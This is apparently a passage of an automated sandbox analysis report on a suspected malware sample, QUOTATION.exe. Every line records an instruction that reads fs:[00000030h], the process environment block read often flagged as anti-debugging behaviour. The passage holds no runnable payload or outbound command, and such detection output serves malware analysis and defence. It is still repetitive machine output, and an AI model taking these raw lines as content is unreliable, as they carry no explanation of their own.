          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A8B58 mov eax, dword ptr fs:[00000030h]17_2_010A8B58
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD52A5 mov eax, dword ptr fs:[00000030h]17_2_00FD52A5
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD52A5 mov eax, dword ptr fs:[00000030h]17_2_00FD52A5
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD52A5 mov eax, dword ptr fs:[00000030h]17_2_00FD52A5
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD52A5 mov eax, dword ptr fs:[00000030h]17_2_00FD52A5
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD52A5 mov eax, dword ptr fs:[00000030h]17_2_00FD52A5
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01003B7A mov eax, dword ptr fs:[00000030h]17_2_01003B7A
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01003B7A mov eax, dword ptr fs:[00000030h]17_2_01003B7A
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0109138A mov eax, dword ptr fs:[00000030h]17_2_0109138A
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0108D380 mov ecx, dword ptr fs:[00000030h]17_2_0108D380
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100138B mov eax, dword ptr fs:[00000030h]17_2_0100138B
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100138B mov eax, dword ptr fs:[00000030h]17_2_0100138B
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100138B mov eax, dword ptr fs:[00000030h]17_2_0100138B
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100B390 mov eax, dword ptr fs:[00000030h]17_2_0100B390
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01002397 mov eax, dword ptr fs:[00000030h]17_2_01002397
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01004BAD mov eax, dword ptr fs:[00000030h]17_2_01004BAD
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01004BAD mov eax, dword ptr fs:[00000030h]17_2_01004BAD
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01004BAD mov eax, dword ptr fs:[00000030h]17_2_01004BAD
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A5BA5 mov eax, dword ptr fs:[00000030h]17_2_010A5BA5
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD9240 mov eax, dword ptr fs:[00000030h]17_2_00FD9240
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD9240 mov eax, dword ptr fs:[00000030h]17_2_00FD9240
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD9240 mov eax, dword ptr fs:[00000030h]17_2_00FD9240
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD9240 mov eax, dword ptr fs:[00000030h]17_2_00FD9240
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010553CA mov eax, dword ptr fs:[00000030h]17_2_010553CA
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010553CA mov eax, dword ptr fs:[00000030h]17_2_010553CA
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA229 mov eax, dword ptr fs:[00000030h]17_2_00FFA229
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA229 mov eax, dword ptr fs:[00000030h]17_2_00FFA229
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA229 mov eax, dword ptr fs:[00000030h]17_2_00FFA229
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA229 mov eax, dword ptr fs:[00000030h]17_2_00FFA229
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA229 mov eax, dword ptr fs:[00000030h]17_2_00FFA229
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA229 mov eax, dword ptr fs:[00000030h]17_2_00FFA229
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA229 mov eax, dword ptr fs:[00000030h]17_2_00FFA229
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA229 mov eax, dword ptr fs:[00000030h]17_2_00FFA229
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA229 mov eax, dword ptr fs:[00000030h]17_2_00FFA229
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010003E2 mov eax, dword ptr fs:[00000030h]17_2_010003E2
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010003E2 mov eax, dword ptr fs:[00000030h]17_2_010003E2
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010003E2 mov eax, dword ptr fs:[00000030h]17_2_010003E2
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010003E2 mov eax, dword ptr fs:[00000030h]17_2_010003E2
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010003E2 mov eax, dword ptr fs:[00000030h]17_2_010003E2
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010003E2 mov eax, dword ptr fs:[00000030h]17_2_010003E2
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FF3A1C mov eax, dword ptr fs:[00000030h]17_2_00FF3A1C
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FDAA16 mov eax, dword ptr fs:[00000030h]17_2_00FDAA16
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FDAA16 mov eax, dword ptr fs:[00000030h]17_2_00FDAA16
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010823E3 mov ecx, dword ptr fs:[00000030h]17_2_010823E3
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010823E3 mov ecx, dword ptr fs:[00000030h]17_2_010823E3
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010823E3 mov eax, dword ptr fs:[00000030h]17_2_010823E3
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD5210 mov eax, dword ptr fs:[00000030h]17_2_00FD5210
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD5210 mov ecx, dword ptr fs:[00000030h]17_2_00FD5210
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD5210 mov eax, dword ptr fs:[00000030h]17_2_00FD5210
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD5210 mov eax, dword ptr fs:[00000030h]17_2_00FD5210
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE8A0A mov eax, dword ptr fs:[00000030h]17_2_00FE8A0A
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFDBE9 mov eax, dword ptr fs:[00000030h]17_2_00FFDBE9
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0109AA16 mov eax, dword ptr fs:[00000030h]17_2_0109AA16
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0109AA16 mov eax, dword ptr fs:[00000030h]17_2_0109AA16
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01014A2C mov eax, dword ptr fs:[00000030h]17_2_01014A2C
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01014A2C mov eax, dword ptr fs:[00000030h]17_2_01014A2C
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01064257 mov eax, dword ptr fs:[00000030h]17_2_01064257
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0109EA55 mov eax, dword ptr fs:[00000030h]17_2_0109EA55
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0108B260 mov eax, dword ptr fs:[00000030h]17_2_0108B260
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0108B260 mov eax, dword ptr fs:[00000030h]17_2_0108B260
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A8A62 mov eax, dword ptr fs:[00000030h]17_2_010A8A62
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE1B8F mov eax, dword ptr fs:[00000030h]17_2_00FE1B8F
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE1B8F mov eax, dword ptr fs:[00000030h]17_2_00FE1B8F
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0101927A mov eax, dword ptr fs:[00000030h]17_2_0101927A
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100D294 mov eax, dword ptr fs:[00000030h]17_2_0100D294
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100D294 mov eax, dword ptr fs:[00000030h]17_2_0100D294
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FDDB60 mov ecx, dword ptr fs:[00000030h]17_2_00FDDB60
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FDF358 mov eax, dword ptr fs:[00000030h]17_2_00FDF358
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100FAB0 mov eax, dword ptr fs:[00000030h]17_2_0100FAB0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FDDB40 mov eax, dword ptr fs:[00000030h]17_2_00FDDB40
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01002ACB mov eax, dword ptr fs:[00000030h]17_2_01002ACB
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01002AE4 mov eax, dword ptr fs:[00000030h]17_2_01002AE4
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094AEF mov eax, dword ptr fs:[00000030h]17_2_01094AEF
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094AEF mov eax, dword ptr fs:[00000030h]17_2_01094AEF
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094AEF mov eax, dword ptr fs:[00000030h]17_2_01094AEF
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094AEF mov eax, dword ptr fs:[00000030h]17_2_01094AEF
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094AEF mov eax, dword ptr fs:[00000030h]17_2_01094AEF
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094AEF mov eax, dword ptr fs:[00000030h]17_2_01094AEF
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094AEF mov eax, dword ptr fs:[00000030h]17_2_01094AEF
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094AEF mov eax, dword ptr fs:[00000030h]17_2_01094AEF
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094AEF mov eax, dword ptr fs:[00000030h]17_2_01094AEF
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094AEF mov eax, dword ptr fs:[00000030h]17_2_01094AEF
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094AEF mov eax, dword ptr fs:[00000030h]17_2_01094AEF
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094AEF mov eax, dword ptr fs:[00000030h]17_2_01094AEF
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094AEF mov eax, dword ptr fs:[00000030h]17_2_01094AEF
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094AEF mov eax, dword ptr fs:[00000030h]17_2_01094AEF
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]17_2_00FFA309
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]17_2_00FFA309
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]17_2_00FFA309
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]17_2_00FFA309
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]17_2_00FFA309
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]17_2_00FFA309
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]17_2_00FFA309
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]17_2_00FFA309
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]17_2_00FFA309
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]17_2_00FFA309
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]17_2_00FFA309
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]17_2_00FFA309
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]17_2_00FFA309
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]17_2_00FFA309
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]17_2_00FFA309
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]17_2_00FFA309
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]17_2_00FFA309
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]17_2_00FFA309
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]17_2_00FFA309
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]17_2_00FFA309
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]17_2_00FFA309
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0109E539 mov eax, dword ptr fs:[00000030h]17_2_0109E539
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0105A537 mov eax, dword ptr fs:[00000030h]17_2_0105A537
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01004D3B mov eax, dword ptr fs:[00000030h]17_2_01004D3B
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01004D3B mov eax, dword ptr fs:[00000030h]17_2_01004D3B
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01004D3B mov eax, dword ptr fs:[00000030h]17_2_01004D3B
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A8D34 mov eax, dword ptr fs:[00000030h]17_2_010A8D34
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01013D43 mov eax, dword ptr fs:[00000030h]17_2_01013D43
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01053540 mov eax, dword ptr fs:[00000030h]17_2_01053540
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01083D40 mov eax, dword ptr fs:[00000030h]17_2_01083D40
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE849B mov eax, dword ptr fs:[00000030h]17_2_00FE849B
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01002581 mov eax, dword ptr fs:[00000030h]17_2_01002581
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01002581 mov eax, dword ptr fs:[00000030h]17_2_01002581
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01002581 mov eax, dword ptr fs:[00000030h]17_2_01002581
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01002581 mov eax, dword ptr fs:[00000030h]17_2_01002581
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFB477 mov eax, dword ptr fs:[00000030h]17_2_00FFB477
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFB477 mov eax, dword ptr fs:[00000030h]17_2_00FFB477
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFB477 mov eax, dword ptr fs:[00000030h]17_2_00FFB477
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFB477 mov eax, dword ptr fs:[00000030h]17_2_00FFB477
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFB477 mov eax, dword ptr fs:[00000030h]17_2_00FFB477
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFB477 mov eax, dword ptr fs:[00000030h]17_2_00FFB477
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFB477 mov eax, dword ptr fs:[00000030h]17_2_00FFB477
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFB477 mov eax, dword ptr fs:[00000030h]17_2_00FFB477
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFB477 mov eax, dword ptr fs:[00000030h]17_2_00FFB477
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFB477 mov eax, dword ptr fs:[00000030h]17_2_00FFB477
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFB477 mov eax, dword ptr fs:[00000030h]17_2_00FFB477
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFB477 mov eax, dword ptr fs:[00000030h]17_2_00FFB477
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01092D82 mov eax, dword ptr fs:[00000030h]17_2_01092D82
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01092D82 mov eax, dword ptr fs:[00000030h]17_2_01092D82
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01092D82 mov eax, dword ptr fs:[00000030h]17_2_01092D82
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01092D82 mov eax, dword ptr fs:[00000030h]17_2_01092D82
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01092D82 mov eax, dword ptr fs:[00000030h]17_2_01092D82
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01092D82 mov eax, dword ptr fs:[00000030h]17_2_01092D82
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01092D82 mov eax, dword ptr fs:[00000030h]17_2_01092D82
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FF746D mov eax, dword ptr fs:[00000030h]17_2_00FF746D
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100FD9B mov eax, dword ptr fs:[00000030h]17_2_0100FD9B
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100FD9B mov eax, dword ptr fs:[00000030h]17_2_0100FD9B
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010035A1 mov eax, dword ptr fs:[00000030h]17_2_010035A1
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A05AC mov eax, dword ptr fs:[00000030h]17_2_010A05AC
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A05AC mov eax, dword ptr fs:[00000030h]17_2_010A05AC
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01001DB5 mov eax, dword ptr fs:[00000030h]17_2_01001DB5
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01001DB5 mov eax, dword ptr fs:[00000030h]17_2_01001DB5
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01001DB5 mov eax, dword ptr fs:[00000030h]17_2_01001DB5
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01056DC9 mov eax, dword ptr fs:[00000030h]17_2_01056DC9
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01056DC9 mov eax, dword ptr fs:[00000030h]17_2_01056DC9
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01056DC9 mov eax, dword ptr fs:[00000030h]17_2_01056DC9
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01056DC9 mov ecx, dword ptr fs:[00000030h]17_2_01056DC9
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01056DC9 mov eax, dword ptr fs:[00000030h]17_2_01056DC9
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01056DC9 mov eax, dword ptr fs:[00000030h]17_2_01056DC9
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0109FDE2 mov eax, dword ptr fs:[00000030h]17_2_0109FDE2
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0109FDE2 mov eax, dword ptr fs:[00000030h]17_2_0109FDE2
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0109FDE2 mov eax, dword ptr fs:[00000030h]17_2_0109FDE2
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0109FDE2 mov eax, dword ptr fs:[00000030h]17_2_0109FDE2
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01088DF1 mov eax, dword ptr fs:[00000030h]17_2_01088DF1
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A740D mov eax, dword ptr fs:[00000030h]17_2_010A740D
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A740D mov eax, dword ptr fs:[00000030h]17_2_010A740D
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A740D mov eax, dword ptr fs:[00000030h]17_2_010A740D
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01091C06 mov eax, dword ptr fs:[00000030h]17_2_01091C06
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01091C06 mov eax, dword ptr fs:[00000030h]17_2_01091C06
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01091C06 mov eax, dword ptr fs:[00000030h]17_2_01091C06
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01091C06 mov eax, dword ptr fs:[00000030h]17_2_01091C06
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01091C06 mov eax, dword ptr fs:[00000030h]17_2_01091C06
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01091C06 mov eax, dword ptr fs:[00000030h]17_2_01091C06
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01091C06 mov eax, dword ptr fs:[00000030h]17_2_01091C06
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01091C06 mov eax, dword ptr fs:[00000030h]17_2_01091C06
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01091C06 mov eax, dword ptr fs:[00000030h]17_2_01091C06
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01091C06 mov eax, dword ptr fs:[00000030h]17_2_01091C06
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01091C06 mov eax, dword ptr fs:[00000030h]17_2_01091C06
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01091C06 mov eax, dword ptr fs:[00000030h]17_2_01091C06
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01091C06 mov eax, dword ptr fs:[00000030h]17_2_01091C06
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01091C06 mov eax, dword ptr fs:[00000030h]17_2_01091C06
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01056C0A mov eax, dword ptr fs:[00000030h]17_2_01056C0A
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01056C0A mov eax, dword ptr fs:[00000030h]17_2_01056C0A
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01056C0A mov eax, dword ptr fs:[00000030h]17_2_01056C0A
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01056C0A mov eax, dword ptr fs:[00000030h]17_2_01056C0A
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FED5E0 mov eax, dword ptr fs:[00000030h]17_2_00FED5E0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FED5E0 mov eax, dword ptr fs:[00000030h]17_2_00FED5E0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100BC2C mov eax, dword ptr fs:[00000030h]17_2_0100BC2C
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100A44B mov eax, dword ptr fs:[00000030h]17_2_0100A44B
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0106C450 mov eax, dword ptr fs:[00000030h]17_2_0106C450
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0106C450 mov eax, dword ptr fs:[00000030h]17_2_0106C450
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD2D8A mov eax, dword ptr fs:[00000030h]17_2_00FD2D8A
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD2D8A mov eax, dword ptr fs:[00000030h]17_2_00FD2D8A
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD2D8A mov eax, dword ptr fs:[00000030h]17_2_00FD2D8A
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD2D8A mov eax, dword ptr fs:[00000030h]17_2_00FD2D8A
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD2D8A mov eax, dword ptr fs:[00000030h]17_2_00FD2D8A
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100AC7B mov eax, dword ptr fs:[00000030h]17_2_0100AC7B
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100AC7B mov eax, dword ptr fs:[00000030h]17_2_0100AC7B
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100AC7B mov eax, dword ptr fs:[00000030h]17_2_0100AC7B
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100AC7B mov eax, dword ptr fs:[00000030h]17_2_0100AC7B
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100AC7B mov eax, dword ptr fs:[00000030h]17_2_0100AC7B
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100AC7B mov eax, dword ptr fs:[00000030h]17_2_0100AC7B
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100AC7B mov eax, dword ptr fs:[00000030h]17_2_0100AC7B
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100AC7B mov eax, dword ptr fs:[00000030h]17_2_0100AC7B
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100AC7B mov eax, dword ptr fs:[00000030h]17_2_0100AC7B
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100AC7B mov eax, dword ptr fs:[00000030h]17_2_0100AC7B
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100AC7B mov eax, dword ptr fs:[00000030h]17_2_0100AC7B
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFC577 mov eax, dword ptr fs:[00000030h]17_2_00FFC577
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFC577 mov eax, dword ptr fs:[00000030h]17_2_00FFC577
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094496 mov eax, dword ptr fs:[00000030h]17_2_01094496
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094496 mov eax, dword ptr fs:[00000030h]17_2_01094496
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094496 mov eax, dword ptr fs:[00000030h]17_2_01094496
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094496 mov eax, dword ptr fs:[00000030h]17_2_01094496
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094496 mov eax, dword ptr fs:[00000030h]17_2_01094496
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094496 mov eax, dword ptr fs:[00000030h]17_2_01094496
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094496 mov eax, dword ptr fs:[00000030h]17_2_01094496
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094496 mov eax, dword ptr fs:[00000030h]17_2_01094496
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094496 mov eax, dword ptr fs:[00000030h]17_2_01094496
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094496 mov eax, dword ptr fs:[00000030h]17_2_01094496
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094496 mov eax, dword ptr fs:[00000030h]17_2_01094496
